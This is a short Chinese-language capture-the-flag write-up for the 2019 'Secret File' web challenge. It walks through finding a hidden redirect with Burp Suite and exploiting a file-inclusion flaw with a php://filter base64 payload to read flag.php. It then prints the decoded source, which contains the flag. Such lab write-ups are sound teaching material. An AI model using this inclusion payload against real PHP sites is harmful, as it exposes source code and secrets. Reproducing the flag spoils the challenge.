[极客大挑战 2019]Secret File
php伪协议
先瞅瞅
进去只有这样几句话,然后查看源码,发现有个跳转的链接
点开链接,发现又有跳转,再点进去,发现查阅结束,想看再倒回去看看,啊这,也没有跳转的链接
不看源代码,直接访问网页,跟看源代码一样,没有信息
想着可能中间的那个过度的网页很快就会过去所以看不到,所以用burpsuite抓包,果然看到了一个secr3t.php
,直接访问,看到了提示
提示说在flag.php
里,然后代码里面过滤掉了一些东西,并且有文件包含漏洞,先访问flag.php
,发现还是看不到,应该不是存在变量里就是注释里,然后利用那个文件包含漏洞,直接file=flag.php
,发现也没什么效果
那么应该需要得到程序源码,用php伪协议读取,构造payloadfile=php://filter/convert.base64-encode/resource=flag.php
,得到base64加密的源代码,解密之后就得到了flag
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{7bf1d873-3ef9-4e6c-9c35-47de1d995a69}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>